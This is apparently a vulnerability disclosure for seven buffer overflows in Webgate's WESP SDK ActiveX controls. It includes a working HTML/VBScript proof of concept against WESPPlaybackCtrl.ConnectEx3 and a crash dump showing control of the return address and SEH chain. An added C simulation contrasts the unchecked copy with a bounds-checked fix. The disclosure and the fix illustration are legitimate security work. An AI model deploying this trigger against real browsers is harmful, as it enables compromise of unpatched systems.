Webgate's technology is focused on digital image processing, embedded system
design and networking to produce embedded-OS web server cameras providing
real-time images. We are also making superior network stand-alone DVRs by
applying our accumulated network and video solution knowledge. The WEBGATE
Embedded Standard Protocol (WESP) SDK supports the same tools in both the
network DVR and the network camera.
Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, Inc.
http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html
Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow
Version information of the tested WESPConfig.DLL (the PoC below targets
WESPPlayback.dll from the same SDK):
CompanyName      WebgateInc
FileDescription  WESPConfig Module
FileVersion      1, 6, 42, 0
InternalName     WESPConfig
LegalCopyright   Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName      WESPConfig Module
ProductVersion   1, 6, 42, 0
******************PoC for Vulnerability 7 (WESPPlaybackCtrl ConnectEx3)***********
The control is instantiated by CLSID and ConnectEx3 is called with an
oversized Address argument (1044 bytes of "A"); the other arguments are filler.
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>
' Arguments follow the ConnectEx3 prototype above; only Address (arg2) is
' oversized. 1044 "A" characters overrun the control's internal buffer.
arg1=1                      ' bDvrs
arg2=String(1044, "A")      ' Address: overlong string triggers the overflow
arg3=1                      ' Port
arg4="defaultV"             ' UserID
arg5="defaultV"             ' Password
arg6=1                      ' extcompany
arg7=1                      ' authType
arg8="defaultV"             ' AdditionalCode
target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
</script>
</html>
******************************
Stack trace for the above PoC

The fault is in an msvcrt string-length loop (MOV CX,[EAX] / INC EAX / INC
EAX / TEST CX,CX, i.e. wcslen) whose pointer argument at EBP+8 has been
overwritten with 0x41414141. The call stack and the SEH chain also hold
0x41414141: the oversized Address string has run past a fixed-size stack
buffer, over the saved return address and the exception registration record,
so the caller-supplied string controls both the return address and the SEH
handler. The overwrite pattern is single-byte 0x41 rather than UTF-16 0x0041,
which indicates that the overflow happens on a narrow (ANSI) copy of the
string rather than on the BSTR itself.
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020
Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP
ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
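The following C program is an added illustration and is not Webgate's code. It models the stack smash the dump above shows: a caller-controlled wide string is narrowed into a fixed-size stack buffer with no length check, and the overrun reaches the saved frame pointer and return address, leaving 0x41414141 where the return target was. The frame is simulated as a byte array so the overrun stays well-defined and can be inspected, and a hardened variant with the missing length check is shown alongside. The buffer size (256 bytes), the frame layout, the placeholder return address (taken from the trace) and the narrowing routine are all assumptions; the input is constructed to mirror `String(1044, "A")` from the PoC.

```c
/*
 * Added illustration, not Webgate's code. Simulates a stack frame as a byte
 * array: [ANSI buffer][saved EBP][return address]. The unchecked narrowing copy
 * overruns into the return address; the checked copy rejects the input.
 * Buffer size, layout and the conversion are assumptions.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ADDR_BUF_BYTES 256u                  /* assumed size of the on-stack ANSI copy */
#define OFF_SAVED_EBP  ADDR_BUF_BYTES        /* saved EBP sits right above the buffer */
#define OFF_RET        (ADDR_BUF_BYTES + 4u) /* return address above that */
#define FRAME_BYTES    (ADDR_BUF_BYTES + 8u)

#define ORIG_RET 0x00999539u   /* placeholder return target, borrowed from the crash trace */

typedef struct { uint8_t bytes[FRAME_BYTES]; } frame_t;

static void frame_init(frame_t *f) {
    uint32_t ebp = 0x0022E56Cu, ret = ORIG_RET;   /* placeholder values from the trace */
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + OFF_SAVED_EBP, &ebp, 4);
    memcpy(f->bytes + OFF_RET, &ret, 4);
}

static uint32_t frame_ret(const frame_t *f) {
    uint32_t v;
    memcpy(&v, f->bytes + OFF_RET, 4);
    return v;
}

/* Length in 16-bit units of a NUL-terminated UTF-16LE string (what a BSTR carries). */
static size_t wlen16(const uint16_t *s) { size_t n = 0; while (s[n]) n++; return n; }

/* Vulnerable pattern: narrow the wide string into the fixed buffer up to the
 * terminator, trusting the caller's length. The only cap is the simulated
 * frame size, so the demo never writes outside `f`; on a real stack the copy
 * would continue past the return address into the SEH record and beyond. */
static void narrow_unchecked(frame_t *f, const uint16_t *wide) {
    size_t n = wlen16(wide) + 1;                   /* terminator included, like wcstombs */
    if (n > sizeof f->bytes) n = sizeof f->bytes;  /* simulation guard only, not a fix */
    for (size_t i = 0; i < n; i++)
        f->bytes[i] = (uint8_t)wide[i];            /* crude ANSI narrowing: drop the high byte */
}

/* Hardened form: refuse input that does not fit together with its terminator. */
static int narrow_checked(frame_t *f, const uint16_t *wide) {
    size_t n = wlen16(wide);
    if (n >= ADDR_BUF_BYTES) return -1;            /* caller gets an error instead of a crash */
    for (size_t i = 0; i <= n; i++)
        f->bytes[i] = (uint8_t)wide[i];
    return 0;
}

/* Constructed input: `count` copies of 'A' as UTF-16LE, mirroring String(count, "A"). */
static uint16_t g_addr[2048];
static void fill_a(size_t count) {
    for (size_t i = 0; i < count; i++) g_addr[i] = 0x0041;
    g_addr[count] = 0;
}

/* Return address left in the simulated frame after the unchecked copy of `count` A's. */
uint32_t ret_after_unchecked(size_t count) {
    frame_t f;
    fill_a(count);
    frame_init(&f);
    narrow_unchecked(&f, g_addr);
    return frame_ret(&f);
}

/* Result of the checked copy: 0 accepted, -1 rejected, -2 if the frame was damaged anyway. */
int checked_rc(size_t count) {
    frame_t f;
    fill_a(count);
    frame_init(&f);
    int rc = narrow_checked(&f, g_addr);
    return (frame_ret(&f) == ORIG_RET) ? rc : -2;
}

int main(void) {
    printf("unchecked, 1044 A's: return address = %08X\n", ret_after_unchecked(1044));
    printf("unchecked,   10 A's: return address = %08X\n", ret_after_unchecked(10));
    printf("checked,   1044 A's: rc = %d\n", checked_rc(1044));
    printf("checked,     10 A's: rc = %d\n", checked_rc(10));
    return 0;
}
```

With the PoC's 1044-character input the unchecked path leaves 41414141 in the return-address slot, matching the "Returns To" column and the SEH entry in the trace; the checked path returns an error and leaves the frame untouched. The boundary in `narrow_checked` is deliberately `>=` so that the terminator always fits, which is the off-by-one that a `>` check would miss.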
P.S. CERT tried to coordinate a fix for these issues with the vendor, but
there was no response from the vendor.
Best Regards,
Praveen Darshanam